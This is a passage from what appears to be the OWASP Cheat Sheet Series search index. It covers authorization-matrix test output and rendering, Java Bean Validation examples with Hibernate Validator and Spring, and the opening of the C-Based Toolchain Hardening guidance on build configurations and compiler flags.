testAccessUsingAnonymousUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 1.009 s  ### FAILURE\njava.lang.AssertionError:\nAccess issues detected using the ANONYMOUS USER point of view:\nThe service 'DeleteMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\nThe service 'CreateMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\ntestAccessUsingBasicUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 0.05 s  ### FAILURE!\njava.lang.AssertionError:\nAccess issues detected using the BASIC USER point of view:\nThe service 'DeleteMessage' when called with POV 'BASIC' return\na response code 200 that is not the expected one (403 expected).\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#rendering-of-the-authorization-matrix-for-an-audit-review","title":"Rendering of the authorization matrix for an audit / review","text":"

Even if the authorization matrix is stored in a human-readable format (XML), it can be useful to provide an on-the-fly rendering of the XML file in order to facilitate the review, audit and discussion of the authorization matrix and to spot potential inconsistencies.

The following XSL stylesheet can be used:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n<xsl:template match=\"/\">\n<html>\n<head>\n<title>Authorization Matrix</title>\n<link rel=\"stylesheet\"\nhref=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\"\nintegrity=\"sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ\"\ncrossorigin=\"anonymous\" />\n</head>\n<body>\n<h3>Roles</h3>\n<ul>\n<xsl:for-each select=\"authorization-matrix/roles/role\">\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</xsl:for-each>\n</ul>\n<h3>Authorizations</h3>\n<table class=\"table table-hover table-sm\">\n<thead class=\"thead-inverse\">\n<tr>\n<th>Service</th>\n<th>URI</th>\n<th>Method</th>\n<th>Role</th>\n</tr>\n</thead>\n<tbody>\n<xsl:for-each select=\"authorization-matrix/services/service\">\n<xsl:variable name=\"service-name\" select=\"@name\" />\n<xsl:variable name=\"service-uri\" select=\"@uri\" />\n<xsl:variable name=\"service-method\" select=\"@http-method\" />\n<xsl:for-each select=\"role\">\n<tr>\n<td scope=\"row\">\n<xsl:value-of select=\"$service-name\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-uri\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-method\" />\n</td>\n<td>\n<xsl:variable name=\"service-role-name\" select=\"@name\" />\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</td>\n</tr>\n</xsl:for-each>\n</xsl:for-each>\n</tbody>\n</table>\n</body>\n</html>\n</xsl:template>\n</xsl:stylesheet>\n
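The stylesheet can be applied with the JDK's built-in XSLT processor, for example with a small utility like the sketch below; the file names (authorization-matrix.xml, authorization-matrix.xsl, authorization-matrix.html) are assumptions to adjust to the project layout.

import java.io.File;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

// Minimal sketch: render the authorization matrix to HTML for review.
// The file names are assumptions; adjust them to the project layout.
public class AuthorizationMatrixRenderer {

    public static void main(String[] args) throws Exception {
        TransformerFactory factory = TransformerFactory.newInstance();
        Transformer transformer = factory.newTransformer(
                new StreamSource(new File("authorization-matrix.xsl")));
        transformer.transform(
                new StreamSource(new File("authorization-matrix.xml")),
                new StreamResult(new File("authorization-matrix.html")));
    }
}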

Example of the rendering:

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html","title":"Bean Validation Cheat Sheet","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Java Bean Validation security functionality in your applications.

Bean validation (JSR303 aka Bean Validation 1.0 / JSR349 aka Bean Validation 1.1) is one of the most common ways to perform input validation in Java. It is an application layer agnostic validation spec which provides the developer with the means to define a set of validation constraints on a domain model and then perform validation of those constraints throughout the various application tiers.

One advantage of this approach is that the validation constraints and the corresponding validators are only written once, thus reducing duplication of effort and ensuring uniformity:

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#typical-validation","title":"Typical Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#bean-validation","title":"Bean Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#setup","title":"Setup","text":"

The examples in this guide use Hibernate Validator (the reference implementation for Bean Validation 1.1).

Add Hibernate Validator to your pom.xml:

<dependency>\n<groupId>org.hibernate</groupId>\n<artifactId>hibernate-validator</artifactId>\n<version>5.2.4.Final</version>\n</dependency>\n

Enable bean validation support in Spring's context.xml:

<beans:beans ...\n...\n<mvc:annotation-driven />\n...\n</beans:beans>\n

For more info, please see the setup guide

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#basics","title":"Basics","text":"

In order to get started using Bean Validation, you must add validation constraints (@Pattern, @Digits, @Min, @Max, @Size, @Past, @Future, @CreditCardNumber, @Email, @URL, etc.) to your model and then utilize the @Valid annotation when passing your model around in various application layers.

Constraints can be applied in several places:

For Bean Validation 1.1 also on:

For the sake of simplicity all the examples below feature field constraints and all validation is triggered by the controller. Refer to the Bean Validation documentation for a full list of examples.

When it comes to error handling, the Hibernate Validator returns a BindingResult object which contains a List<ObjectError>. The examples below feature simplistic error handling, while a production ready application would have a more elaborate design that takes care of logging and error page redirection.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#predefined-constraints","title":"Predefined Constraints","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#pattern","title":"@Pattern","text":"

Annotation:

@Pattern(regexp=, flags=)

Data Type:

CharSequence

Use:

Checks if the annotated string matches the regular expression regexp, considering the given flags. Please visit the OWASP Validation Regex Repository for other useful regexes.

Reference:

Documentation

Model:

import javax.validation.constraints.Pattern;\n\npublic class Article  {\n//Constraint: Alphanumeric article titles only, using a regular expression\n@Pattern(regexp = \"[a-zA-Z0-9 ]+\")\nprivate String articleTitle;\npublic String getArticleTitle()  {\nreturn  articleTitle;\n}\npublic void setArticleTitle(String  articleTitle)  {\nthis.articleTitle  =  articleTitle;\n}\n\n...\n\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Article;\n\n@Controller\npublic class ArticleController  {\n\n...\n\n@RequestMapping(value = \"/postArticle\",  method = RequestMethod.POST)\npublic @ResponseBody String postArticle(@Valid  Article  article,  BindingResult  result,\nHttpServletResponse  response) {\nif (result.hasErrors()) {\nString errorMessage  =  \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor(ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \" +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#digits","title":"@Digits","text":"

Annotation:

@Digits(integer=,fraction=)

Data Type:

BigDecimal, BigInteger, CharSequence, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of Number

Use:

Checks whether the annotated value is a number having up to integer digits and fraction fractional digits

Reference:

Documentation

Model:

import javax.validation.constraints.Digits;\n\npublic class Customer {\n//Constraint: Age can only be 3 digits long or less\n@Digits(integer = 3, fraction = 0)\nprivate int age;\n\npublic int getAge() {\nreturn age;\n}\n\npublic void setAge(int age) {\nthis.age = age;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Customer;\n\n@Controller\npublic class CustomerController  {\n\n...\n\n@RequestMapping(value = \"/registerCustomer\",  method = RequestMethod.POST)\npublic @ResponseBody String registerCustomer(@Valid Customer customer, BindingResult result,\nHttpServletResponse  response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\n\nfor( ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \"  +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#size","title":"@Size","text":"

Annotation:

@Size(min=, max=)

Data Type:

CharSequence, Collection, Map and Arrays

Use:

Checks if the annotated element's size is between min and max (inclusive)

Reference:

Documentation

Model:

import javax.validation.constraints.Size;\n\npublic class Message {\n\n//Constraint: Message must be at least 10 characters long, but less than 500\n@Size(min = 10, max = 500)\nprivate String message;\n\npublic String getMessage() {\nreturn message;\n}\n\npublic void setMessage(String message) {\nthis.message = message;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.Message;\n\n@Controller\npublic\u00a0class\u00a0MessageController\u00a0{\n\n...\n\n@RequestMapping(value=\"/sendMessage\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0sendMessage(@Valid\u00a0Message\u00a0message,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#past-future","title":"@Past / @Future","text":"

Annotation:

@Past, @Future

Data Type:

java.util.Date, java.util.Calendar, java.time.chrono.ChronoZonedDateTime, java.time.Instant, java.time.OffsetDateTime

Use:

Checks whether the annotated date is in the past / future

Reference:

Documentation

Model:

import java.util.Date;\nimport javax.validation.constraints.Past;\nimport javax.validation.constraints.Future;\n\npublic class DoctorVisit {\n\n//Constraint: Birthdate must be in the past\n@Past\nprivate Date birthDate;\n\npublic Date getBirthDate() {\nreturn birthDate;\n}\n\npublic void setBirthDate(Date birthDate) {\nthis.birthDate = birthDate;\n}\n\n//Constraint: Scheduled visit date must be in the future\n@Future\nprivate Date scheduledVisitDate;\n\npublic Date getScheduledVisitDate() {\nreturn scheduledVisitDate;\n}\n\npublic void setScheduledVisitDate(Date scheduledVisitDate) {\nthis.scheduledVisitDate = scheduledVisitDate;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.DoctorVisit;\n\n@Controller\npublic\u00a0class\u00a0DoctorVisitController\u00a0{\n\n...\n\n@RequestMapping(value=\"/scheduleVisit\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0scheduleVisit(@Valid\u00a0DoctorVisit\u00a0doctorvisit,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#combining-constraints","title":"Combining Constraints","text":"

Validation annotations can be combined in any suitable way. For instance, to specify a valid reviewRating value between 1 and 5, specify the validation like this:

Annotation:

@Min(value=), @Max(value=)

Data Type:

BigDecimal, BigInteger, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of CharSequence (the numeric value represented by the character sequence is evaluated), any sub-type of Number

Use:

Checks whether the annotated value is higher than or equal to the specified minimum (@Min) or lower than or equal to the specified maximum (@Max)

Reference:

Documentation

Model:

import javax.validation.constraints.Min;\nimport javax.validation.constraints.Max;\n\npublic class Review {\n\n//Constraint: Review rating must be between 1 and 5\n@Min(1)\n@Max(5)\nprivate int reviewRating;\n\npublic int getReviewRating() {\nreturn reviewRating;\n}\n\npublic void setReviewRating(int reviewRating) {\nthis.reviewRating = reviewRating;\n}\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.ReviewRating;\n\n@Controller\npublic\u00a0class\u00a0ReviewController\u00a0{\n\n...\n\n@RequestMapping(value=\"/postReview\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0postReview(@Valid\u00a0Review\u00a0review,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#cascading-constraints","title":"Cascading Constraints","text":"

Validating one bean is a good start, but often, beans are nested or form a complete graph of beans. To validate that graph in one go, apply cascading validation with @Valid.
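A minimal sketch of cascading validation, assuming a hypothetical Order bean that lives alongside the Customer bean shown earlier: annotating the field with @Valid causes the nested bean's constraints to be validated together with the outer bean.

import javax.validation.Valid;
import javax.validation.constraints.Size;

public class Order {

    //Constraint: Order reference must be between 5 and 20 characters
    @Size(min = 5, max = 20)
    private String reference;

    //Cascading validation: the Customer bean's own constraints (such as @Digits on age)
    //are validated whenever this Order instance is validated
    @Valid
    private Customer customer;

    public String getReference() {
        return reference;
    }

    public void setReference(String reference) {
        this.reference = reference;
    }

    public Customer getCustomer() {
        return customer;
    }

    public void setCustomer(Customer customer) {
        this.customer = customer;
    }
}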

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#additional-constraints","title":"Additional Constraints","text":"

In addition to providing the complete set of JSR303 constraints, Hibernate Validator also defines some additional constraints for convenience:

Take a look at this table for the complete list.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#custom-constraints","title":"Custom Constraints","text":"

One of the most powerful features of bean validation is the ability to define your own constraints that go beyond the simple validation offered by built-in constraints.

Creating custom constraints is beyond the scope of this guide. Please see this documentation.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#error-messages","title":"Error Messages","text":"

It is possible to specify a message ID with the validation annotation, so that error messages are customized:

@Pattern(regexp = \"[a-zA-Z0-9 ]+\", message = \"article.title.error\")\nprivate String articleTitle;\n

Spring MVC will then look up a message with ID article.title.error in a defined MessageSource. More on this in the documentation.
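For example, assuming Java-based Spring configuration and a messages.properties file on the classpath containing a line such as article.title.error=Article titles may only contain letters, digits and spaces, a MessageSource bean could be declared as in the sketch below.

import org.springframework.context.MessageSource;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.support.ReloadableResourceBundleMessageSource;

// Sketch: resolve message IDs such as article.title.error from messages.properties.
@Configuration
public class MessageConfig {

    @Bean
    public MessageSource messageSource() {
        ReloadableResourceBundleMessageSource messageSource = new ReloadableResourceBundleMessageSource();
        messageSource.setBasename("classpath:messages");
        messageSource.setDefaultEncoding("UTF-8");
        return messageSource;
    }
}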

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html","title":"C-Based Toolchain Hardening Cheat Sheet","text":""},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#introduction","title":"Introduction","text":"

C-Based Toolchain Hardening is a treatment of project settings that will help you deliver reliable and secure code when using C, C++ and Objective C languages in a number of development environments. This article will examine Microsoft and GCC toolchains for the C, C++ and Objective C languages. It will guide you through the steps you should take to create executables with firmer defensive postures and increased integration with the available platform security. Effectively configuring the toolchain also means your project will enjoy a number of benefits during development, including enhanced warnings and static analysis, and self-debugging code.

There are four areas to be examined when hardening the toolchain: configuration, preprocessor, compiler, and linker. Nearly all areas are overlooked or neglected when setting up a project. The neglect appears to be pandemic, and it applies to nearly all projects, including Auto-configured projects, Makefile-based, Eclipse-based, Visual Studio-based, and Xcode-based ones. It's important to address the gaps at configuration and build time because it's difficult or impossible to add hardening to a distributed executable after the fact on some platforms.

This is a prescriptive article, and it will not debate semantics or speculate on behavior. Some information, such as the C/C++ committee's motivation and pedigree for program diagnostics, NDEBUG, assert, and abort(), appears to be lost like a tale in the Lord of the Rings. As such, the article will specify semantics (for example, the philosophy of 'debug' and 'release' build configurations), assign behaviors (for example, what an assert should do in 'debug' and 'release' build configurations), and present a position. If you find the posture too aggressive, then you should back off as required to suit your taste.

A secure toolchain is not a silver bullet. It is one piece of an overall strategy in the engineering process to help ensure success. It will complement existing processes such as static analysis, dynamic analysis, secure coding, negative test suites, and the like. Tools such as Valgrind and Helgrind will still be needed. And a project will still require solid designs and architectures.

The OWASP ESAPI C++ project eats its own dog food. Many of the examples you will see in this article come directly from the ESAPI C++ project.

Finally, a Cheat Sheet is available for those who desire a terse treatment of the material. Please visit C-Based Toolchain Hardening Cheat Sheet for the abbreviated version.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#wisdom","title":"Wisdom","text":"

Code must be correct. It should be secure. It can be efficient.

Dr. Jon Bentley: \"If it doesn't have to be correct, I can make it as fast as you'd like it to be\".

Dr. Gary McGraw: \"Thou shalt not rely solely on security features and functions to build secure software as security is an emergent property of the entire system and thus relies on building and integrating all parts properly\".

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configuration","title":"Configuration","text":"

Configuration is the first opportunity to configure your project for success. Not only do you have to configure your project to meet reliability and security goals, you must also configure integrated libraries properly. You typically have three choices. First, you can use auto-configuration utilities if on Linux or Unix. Second, you can write a makefile by hand. This is predominant on Linux, macOS, and Unix, but it applies to Windows as well. Finally, you can use an integrated development environment or IDE.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#build-configurations","title":"Build Configurations","text":"

At this stage in the process, you should concentrate on configuring for two builds: Debug and Release. Debug will be used for development and include full instrumentation. Release will be configured for production. The difference between the two settings is usually optimization level and debug level. A third build configuration is Test, and it's usually a special case of Release.

For debug and release builds, the settings are typically diametrically opposed. Debug configurations have no optimizations and full debug information; while Release builds have optimizations and minimal to moderate debug information. In addition, debug code has full assertions and additional library integration, such as mudflaps and malloc guards such as dmalloc.

The Test configuration is often a Release configuration that makes everything public for testing and builds a test harness. For example, all member functions (C++ classes) and all interfaces (libraries or shared objects) should be made public and available for testing. Many object-oriented purists oppose testing private interfaces, but this is not about object-orientedness. This (q.v.) is about building reliable and secure software.

GCC 4.8 introduced the -Og optimization level. Note that it is only an optimization level, and it still requires a customary debug level via -g.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#debug-builds","title":"Debug Builds","text":"

Debug builds are where developers spend most of their time when vetting problems, so this build should concentrate forces and tools or be a 'force multiplier'. Though many do not realize it, debug code is more highly valued than release code because it's adorned with additional instrumentation. The debug instrumentation will cause a program to become nearly \"self-debugging\", and help you catch mistakes such as bad parameters, failed API calls, and memory problems.

Self-debugging code reduces your time during troubleshooting and debugging. Reducing time under the debugger means you have more time for development and feature requests. If code is checked in without debug instrumentation, it should be fixed by adding instrumentation or rejected.

For GCC, optimizations and debug symbolication are controlled through two switches: -O and -g. You should use the following as part of your CFLAGS and CXXFLAGS for a minimal debug session:

-O0 -g3 -ggdb\n

-O0 turns off optimizations and -g3 ensures maximum debug information is available. You may need to use -O1 so some analysis is performed. Otherwise, your debug build will be missing a number of warnings not present in release builds. -g3 ensures maximum debugging information is available for the debug session, including symbolic constants and #defines. -ggdb includes extensions to help with a debug session under GDB. For completeness, Jan Krachtovil stated in a private email that -ggdb currently has no effect.

Release builds should also consider the configuration pair of -mfunction-return=thunk and -mindirect-branch=thunk. These are the \"Retpoline\" fix, which is an indirect branch used to thwart speculative execution CPU vulnerabilities such as Spectre and Meltdown. The CPU cannot tell what code to speculatively execute because it is an indirect (as opposed to a direct) branch. This is an extra layer of indirection, like calling a pointer through a pointer.

Debug builds should also define DEBUG, and ensure NDEBUG is not defined. NDEBUG removes \"program diagnostics\" and has undesirable behavior and side effects, which are discussed below in more detail. The defines should be present for all code, and not just the program. You use them for all code (your program and included libraries) because you need to know how the libraries fail too (remember, you take the bug report - not the third party library).

In addition, you should use other relevant flags, such as -fno-omit-frame-pointer. Ensuring a frame pointer exists makes it easier to decode stack traces. Since debug builds are not shipped, it's OK to leave symbols in the executable. Programs with debug information do not suffer performance hits. See, for example, How does the gcc -g option affect performance?

Finally, you should ensure your project includes additional diagnostic libraries, such as dmalloc and Address Sanitizer. A comparison of some memory checking tools can be found at Comparison Of Memory Tools. If you don't include additional diagnostics in debug builds, then you should start using them, since it's OK to find errors you are not looking for.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#release-builds","title":"Release Builds","text":"

Release builds are what your customer receives. They are meant to be run on production hardware and servers, and they should be reliable, secure, and efficient. A stable release build is the product of the hard work and effort during development.

For release builds, you should use the following as part of your CFLAGS and CXXFLAGS:

-On -g2\n

-On sets optimizations for speed or size (for example, -Os or -O2), and -g2 ensures debugging information is created.

Debugging information should be stripped from the shipped binary and retained separately, in case a crash report from the field needs to be symbolicated. While not desired, debug information can be left in place without a performance penalty. See How does the gcc -g option affect performance? for details.

Release builds should also define NDEBUG, and ensure DEBUG is not defined. The time for debugging and diagnostics is over, so users get production code with full optimizations, no \"programming diagnostics\", and other efficiencies. If you can't optimize or you are performing excessive logging, it usually means the program is not ready for production.

If you have been relying on an assert and then a subsequent abort(), you have been abusing \"program diagnostics\" since it has no place in production code. If you want a memory dump, create one so users don't have to worry about secrets and other sensitive information being written to the filesystem and emailed in plain text.

For Windows, you would use /Od for debug builds; and /Ox, /O2 or /Os for release builds. See Microsoft's /O Options (Optimize Code) for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#test-builds","title":"Test Builds","text":"

Test builds are used to provide heuristic validation by way of positive and negative test suites. Under a test configuration, all interfaces are tested to ensure they perform to specification and satisfaction. \"Satisfaction\" is subjective, but it should include no crashing and no trashing of your memory arena, even when faced with negative tests.

Because all interfaces are tested (and not just the public ones), your CFLAGS and CXXFLAGS should include:

-Dprotected=public -Dprivate=public\n

You should also change __attribute__ ((visibility (\"hidden\"))) to __attribute__ ((visibility (\"default\"))).

Nearly everyone gets a positive test right, so no more needs to be said. The negative self tests are much more interesting, and you should concentrate on trying to make your program fail so you can verify it fails gracefully. Remember, a bad actor is not going to be courteous when they attempt to cause your program to fail. And it's your project that takes egg on the face by way of a bug report or guest appearance on Full Disclosure or Bugtraq - not <some library> you included.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#auto-tools","title":"Auto Tools","text":"

Auto configuration tools are popular on many Linux and Unix based systems, and the tools include Autoconf, Automake, config, and Configure. The tools work together to produce project files from scripts and template files. After the process completes, your project should be set up and ready to be built with make.

When using auto configuration tools, there are a few files of interest worth mentioning. The files are part of the auto tools chain and include m4 and the various *.in, *.ac (autoconf), and *.am (automake) files. At times, you will have to open them, or the resulting makefiles, to tune the \"stock\" configuration.

There are three downsides to the command-line configuration tools in the toolchain: (1) they often ignore user requests, (2) they cannot create configurations, and (3) security is often not a goal.

To demonstrate the first issue, configure your project with the following: configure CFLAGS=\"-Wall -fPIE\" CXXFLAGS=\"-Wall -fPIE\" LDFLAGS=\"-pie\". You will probably find the auto tools ignored your request, which means the command below will not produce the expected results. As a workaround, you will have to open the m4 scripts, Makefile.in or Makefile.am and fix the configuration.

$ configure CFLAGS=\"-Wall -Wextra -Wconversion -fPIE -Wno-unused-parameter\n    -Wformat=2 -Wformat-security -fstack-protector-all -Wstrict-overflow\"\nLDFLAGS=\"-pie -z,noexecstack -z,noexecheap -z,relro -z,now\"\n

For the second point, you will probably be disappointed to learn Automake does not support the concept of configurations. It's not entirely Autoconf's or Automake's fault - Make and its inability to detect changes is the underlying problem. Specifically, Make only checks modification times of prerequisites and targets, and does not check things like CFLAGS and CXXFLAGS. The net effect is you will not receive expected results when you issue make debug and then make test or make release.

Finally, you will probably be disappointed to learn tools such as Autoconf and Automake miss many security-related opportunities and ship insecure out of the box. There are a number of compiler switches and linker flags that improve the defensive posture of a program, but they are not 'on' by default. Tools like Autoconf - which are supposed to handle this situation - often provide settings that serve the lowest common denominator.

A recent discussion on the Automake mailing list illuminates the issue: Enabling compiler warning flags. Attempts to improve default configurations were met with resistance and no action was taken. The resistance is often of the form, \"<some useful warning> also produces false positives\" or \"<some obscure platform> does not support <established security feature>\". It's noteworthy that David Wheeler, the author of Secure Programming for Linux and Unix HOWTO, was one of the folks trying to improve the posture.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#makefiles","title":"Makefiles","text":"

Make is one of the earliest build tools, dating back to the 1970s. It's available on Linux, macOS and Unix, so you will frequently encounter projects using it. Unfortunately, Make has a number of shortcomings (Recursive Make Considered Harmful and What's Wrong With GNU make?), and can cause some discomfort. Despite issues with Make, ESAPI C++ uses Make primarily for three reasons: first, it's omnipresent; second, it's easier to manage than the Auto Tools family; and third, libtool was out of the question.

Consider what happens when you: (1) type make debug, and then type make release. Each build would require different CFLAGS due to optimizations and level of debug support. In your makefile, you would extract the relevant target and set CFLAGS and CXXFLAGS similar to below (taken from ESAPI C++ Makefile):

## Makefile\nDEBUG_GOALS = $(filter $(MAKECMDGOALS), debug)\nifneq ($(DEBUG_GOALS),)\n    WANT_DEBUG := 1\n    WANT_TEST := 0\n    WANT_RELEASE := 0\nendif\n\u2026\n\nifeq ($(WANT_DEBUG),1)\n    ESAPI_CFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\n    ESAPI_CXXFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\nendif\n\nifeq ($(WANT_RELEASE),1)\n    ESAPI_CFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\n    ESAPI_CXXFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\nendif\n\nifeq ($(WANT_TEST),1)\n    ESAPI_CFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                      -Dprotected=public\n    ESAPI_CXXFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                        -Dprotected=public\nendif\n\u2026\n\n## Merge ESAPI flags with user supplied flags. We perform the extra step to ensure\n## user options follow our options, which should give user option's a preference.\noverride CFLAGS := $(ESAPI_CFLAGS) $(CFLAGS)\noverride CXXFLAGS := $(ESAPI_CXXFLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(ESAPI_LDFLAGS) $(LDFLAGS)\n\u2026\n

Make will first build the program in a debug configuration for a session under the debugger using a rule similar to:

%.o: %.cpp\n        $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< -o $@\n

When you want the release build, Make will do nothing because it considers everything up to date despite the fact CFLAGS and CXXFLAGS have changed. Hence, your program will actually be in a debug configuration and risk a SIGABRT at runtime because debug instrumentation is present (recall assert calls abort() when NDEBUG is not defined). In essence, you have DoS'd yourself due to make.

In addition, many projects do not honor the user's command-line. ESAPI C++ does its best to ensure a user's flags are honored via override as shown above, but other projects do not. For example, consider a project that should be built with Position Independent Executable (PIE or ASLR) enabled and data execution prevention (DEP) enabled. Dismissing user settings combined with insecure out of the box settings (and not picking them up during auto-setup or auto-configure) means a program built with the following will likely have neither defense:

make CFLAGS=\"-fPIE\" CXXFLAGS=\"-fPIE\" LDFLAGS=\"-pie -z,noexecstack, -z,noexecheap\"\n

Defenses such as ASLR and DEP are especially important on Linux because Data Execution - not Prevention - is the norm.

